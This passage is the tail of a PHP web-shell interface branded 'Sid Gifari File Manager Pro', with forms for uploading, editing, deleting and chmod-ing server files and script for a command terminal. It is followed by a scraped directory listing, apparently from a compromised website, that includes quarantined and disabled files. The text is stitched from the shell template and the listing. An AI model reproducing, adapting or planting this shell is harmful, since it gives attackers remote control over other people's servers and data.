                        <form method="post" action="?dir=<?= urlencode(encodePath($current_dir)) ?>" class="form-inline" style="margin: 0;">
                            <input type="text" name="newfolder" placeholder="📁 New folder name..." required>
                            <button type="submit" class="btn btn-primary">Create Folder</button>
                        </form>
                        
                        <form method="post" action="?dir=<?= urlencode(encodePath($current_dir)) ?>" class="form-inline" style="margin: 0;">
                            <input type="text" name="newfile" placeholder="📄 New file name..." required>
                            <button type="submit" class="btn btn-info">Create File</button>
                        </form>
                        
                        <form method="post" enctype="multipart/form-data" action="?dir=<?= urlencode(encodePath($current_dir)) ?>" class="form-inline" style="margin: 0;">
                            <input type="file" name="files[]" multiple required style="padding: 8px;">
                            <button type="submit" class="btn btn-warning">⬆️ Upload Files</button>
                        </form>
                    </div>
                </div>

                <!-- File Browser -->
                <div class="section">
                    <div class="section-title">
                        <span>📂</span>
                        <span>File Browser</span>
                        <span style="margin-left: auto; font-size: 11px; color: #8b949e;">
                            <?= count($folders) + count($files) ?> items
                        </span>
                    </div>
                    
                    <div class="file-browser-container">
                        <table>
                            <thead>
                                <tr>
                                    <th style="width: 40%;">Name</th>
                                    <th style="width: 10%;">Size</th>
                                    <th style="width: 12%;">Permissions</th>
                                    <th style="width: 15%;">Modified</th>
                                    <th style="width: 23%;">Actions</th>
                                </tr>
                            </thead>
                            <tbody>
                                <!-- Parent directory link -->
                                <?php if ($current_dir !== $ROOT): ?>
                                <tr class="folder-row">
                                    <td colspan="5">
                                        <a href="?dir=<?= urlencode(encodePath(dirname($current_dir))) ?>" style="display: flex; align-items: center;">
                                            <span class="file-icon">📂</span>
                                            <strong>.. (Parent Directory)</strong>
                                        </a>
                                    </td>
                                </tr>
                                <?php endif; ?>
                                
                                <!-- Folders -->
                                <?php foreach ($folders as $folder): ?>
                                <tr class="folder-row">
                                    <td>
                                        <a href="?dir=<?= urlencode(encodePath($folder['path'])) ?>" style="display: flex; align-items: center;">
                                            <span class="file-icon">📁</span>
                                            <strong><?= htmlspecialchars($folder['name']) ?></strong>
                                        </a>
                                    </td>
                                    <td style="color: #8b949e;">—</td>
                                    <td style="font-family: monospace; font-size: 11px;"><?= $folder['perms'] ?></td>
                                    <td style="font-size: 11px;"><?= date('Y-m-d H:i', $folder['modified']) ?></td>
                                    <td>
                                        <div class="actions">
                                            <form method="post" action="?dir=<?= urlencode(encodePath($current_dir)) ?>" style="display: inline-flex; gap: 4px; align-items: center;">
                                                <input type="hidden" name="old" value="<?= htmlspecialchars($folder['name']) ?>">
                                                <input type="text" name="new" placeholder="New name" style="width: 100px; padding: 4px 8px; font-size: 11px;">
                                                <button type="submit" class="btn btn-info btn-sm">Rename</button>
                                            </form>
                                            <form method="post" action="?dir=<?= urlencode(encodePath($current_dir)) ?>" style="display: inline;" onsubmit="return confirm('Delete folder: <?= addslashes(htmlspecialchars($folder['name'])) ?>?');">
                                                <input type="hidden" name="delete" value="<?= htmlspecialchars($folder['name']) ?>">
                                                <button type="submit" class="btn btn-danger btn-sm">Delete</button>
                                            </form>
                                        </div>
                                    </td>
                                </tr>
                                <?php endforeach; ?>
                                
                                <!-- Files -->
                                <?php foreach ($files as $file): ?>
                                <tr class="file-row">
                                    <td>
                                        <a href="?view=<?= urlencode($file['name']) ?>&dir=<?= urlencode(encodePath($current_dir)) ?>" target="_blank" style="display: flex; align-items: center;">
                                            <span class="file-icon">
                                                <?php
                                                $ext = $file['extension'];
                                                $icon = '📄';
                                                $icons = [
                                                    'php' => '🐘', 'js' => '📜', 'css' => '🎨', 'html' => '🌐',
                                                    'txt' => '📝', 'jpg' => '🖼️', 'png' => '🖼️', 'gif' => '🖼️',
                                                    'jpeg' => '🖼️', 'pdf' => '📕', 'zip' => '📦', 'rar' => '📦',
                                                    'tar' => '📦', 'gz' => '📦', 'sql' => '🗃️', 'json' => '📋',
                                                    'xml' => '📄', 'md' => '📖', 'log' => '📋', 'mp3' => '🎵',
                                                    'mp4' => '🎬', 'avi' => '🎬', 'mov' => '🎬', 'wav' => '🎵',
                                                    'doc' => '📘', 'docx' => '📘', 'xls' => '📗', 'xlsx' => '📗'
                                                ];
                                                if (isset($icons[$ext])) $icon = $icons[$ext];
                                                echo $icon;
                                                ?>
                                            </span>
                                            <?= htmlspecialchars($file['name']) ?>
                                        </a>
                                        <?php if (realpath($file['path']) === realpath(__FILE__)): ?>
                                        <span class="badge badge-protected">Protected</span>
                                        <?php endif; ?>
                                    </td>
                                    <td style="font-family: monospace; font-size: 11px;"><?= formatBytes($file['size']) ?></td>
                                    <td style="font-family: monospace; font-size: 11px;">
                                        <form method="post" action="?dir=<?= urlencode(encodePath($current_dir)) ?>" style="display: inline-flex; gap: 4px; align-items: center;">
                                            <input type="hidden" name="chmod_file" value="<?= htmlspecialchars($file['name']) ?>">
                                            <input type="text" name="chmod" value="<?= $file['perms'] ?>" style="width: 55px; padding: 2px 4px; font-size: 11px; text-align: center;">
                                            <button type="submit" class="btn btn-warning btn-sm">Set</button>
                                        </form>
                                    </td>
                                    <td style="font-size: 11px;"><?= date('Y-m-d H:i', $file['modified']) ?></td>
                                    <td>
                                        <div class="actions">
                                            <a href="?edit=<?= urlencode($file['name']) ?>&dir=<?= urlencode(encodePath($current_dir)) ?>">
                                                <button type="button" class="btn btn-primary btn-sm">Edit</button>
                                            </a>
                                            <a href="?download=<?= urlencode($file['name']) ?>&dir=<?= urlencode(encodePath($current_dir)) ?>">
                                                <button type="button" class="btn btn-info btn-sm">Download</button>
                                            </a>
                                            <form method="post" action="?dir=<?= urlencode(encodePath($current_dir)) ?>" style="display: inline-flex; gap: 4px; align-items: center;">
                                                <input type="hidden" name="old" value="<?= htmlspecialchars($file['name']) ?>">
                                                <input type="text" name="new" placeholder="New name" style="width: 100px; padding: 4px 8px; font-size: 11px;">
                                                <button type="submit" class="btn btn-info btn-sm">Rename</button>
                                            </form>
                                            <form method="post" action="?dir=<?= urlencode(encodePath($current_dir)) ?>" style="display: inline;" onsubmit="return confirm('Delete file: <?= addslashes(htmlspecialchars($file['name'])) ?>?');">
                                                <input type="hidden" name="delete" value="<?= htmlspecialchars($file['name']) ?>">
                                                <button type="submit" class="btn btn-danger btn-sm">Delete</button>
                                            </form>
                                        </div>
                                    </td>
                                </tr>
                                <?php endforeach; ?>
                                
                                <?php if (empty($folders) && empty($files)): ?>
                                <tr>
                                    <td colspan="5" style="text-align: center; padding: 30px; color: #8b949e;">
                                        📭 This directory is empty
                                    </td>
                                </tr>
                                <?php endif; ?>
                            </tbody>
                        </table>
                    </div>
                </div>
            <?php endif; ?>
        </div>

        <div class="footer">
            <strong>Sid Gifari File Manager Pro v8.0.5</strong> | 
            Current Path: <?= htmlspecialchars($current_dir) ?> | 
            Session Dir: <?= htmlspecialchars($_SESSION['current_browsing_dir'] ?? 'not set') ?> | 
            PHP <?= phpversion() ?> | 
            Server: <?= htmlspecialchars($_SERVER['SERVER_SOFTWARE'] ?? 'Unknown') ?>
        </div>
    </div>

    <script>
    document.addEventListener('DOMContentLoaded', function() {
        const terminalInput = document.getElementById('terminalInput');
        const terminalHistory = <?= json_encode(array_reverse(array_unique($terminal_history))) ?>;
        let historyIndex = -1;
        
        if (terminalInput) {
            terminalInput.focus();
            
            terminalInput.addEventListener('keydown', function(e) {
                if (e.key === 'ArrowUp') {
                    e.preventDefault();
                    if (historyIndex < terminalHistory.length - 1) {
                        historyIndex++;
                        this.value = terminalHistory[historyIndex];
                    }
                } else if (e.key === 'ArrowDown') {
                    e.preventDefault();
                    if (historyIndex > 0) {
                        historyIndex--;
                        this.value = terminalHistory[historyIndex];
                    } else {
                        historyIndex = -1;
                        this.value = '';
                    }
                } else if (e.key === 'l' && e.ctrlKey) {
                    e.preventDefault();
                    this.value = 'clear';
                    this.form.submit();
                }
            });
        }
        
        const textarea = document.querySelector('textarea');
        if (textarea) {
            const adjustHeight = function() {
                this.style.height = 'auto';
                this.style.height = (this.scrollHeight) + 'px';
            };
            textarea.addEventListener('input', adjustHeight);
            adjustHeight.call(textarea);
            
            textarea.addEventListener('keydown', function(e) {
                if (e.key === 'Tab') {
                    e.preventDefault();
                    const start = this.selectionStart;
                    const end = this.selectionEnd;
                    this.value = this.value.substring(0, start) + '    ' + this.value.substring(end);
                    this.selectionStart = this.selectionEnd = start + 4;
                }
            });
        }
        
        // Add keyboard shortcut: Ctrl+D to go to root directory
        document.addEventListener('keydown', function(e) {
            if (e.key === 'd' && e.ctrlKey && !e.target.closest('input, textarea')) {
                e.preventDefault();
                window.location.href = '?dir=<?= urlencode(encodePath($ROOT)) ?>';
            }
        });
    });
    </script>
</body>
</html>")); ?> </html>
[+]
..
[+]
ediwarehousebot
[+]
2
[-] style.css
[edit]
[-] config.php
[edit]
[-] test1.php
[edit]
[-] t1.php
[edit]
[-] header.php
[edit]
[-] ml.php-an theloume na to steiloyme mono toy
[edit]
[+]
vendor
[-] headerpending.php
[edit]
[-] error_log
[edit]
[-] pending.php
[edit]
[-] delivered.php
[edit]
[-] 2.php
[edit]
[-] script.js
[edit]
[-] headerdelivered.php
[edit]
[-] 3.php
[edit]
[+]
old
[+]
cgi-bin
[+]
.well-known
[+]
E3
[+]
drage
[+]
f7
[+]
eviball
[+]
capetown
[+]
eurostock
[+]
2fast
[+]
biq
[+]
cite
[+]
ilark
[+]
pride
[+]
dragb
[+]
itank
[-] sql_command_import_capetown.php
[edit]
[+]
itango
[+]
sales_rd
[+]
rd
[+]
one
[-] jSignature-master.zip
[edit]
[+]
jsi
[+]
nce
[-] sales_rd.zip
[edit]
[+]
RrVFn0it5f
[-] wap.php
[edit]
[-] index.php
[edit]
[-] products.php
[edit]
[-] detail.php
[edit]
[-] .htaccess.disabled
[edit]
[-] 1.php.quarantine
[edit]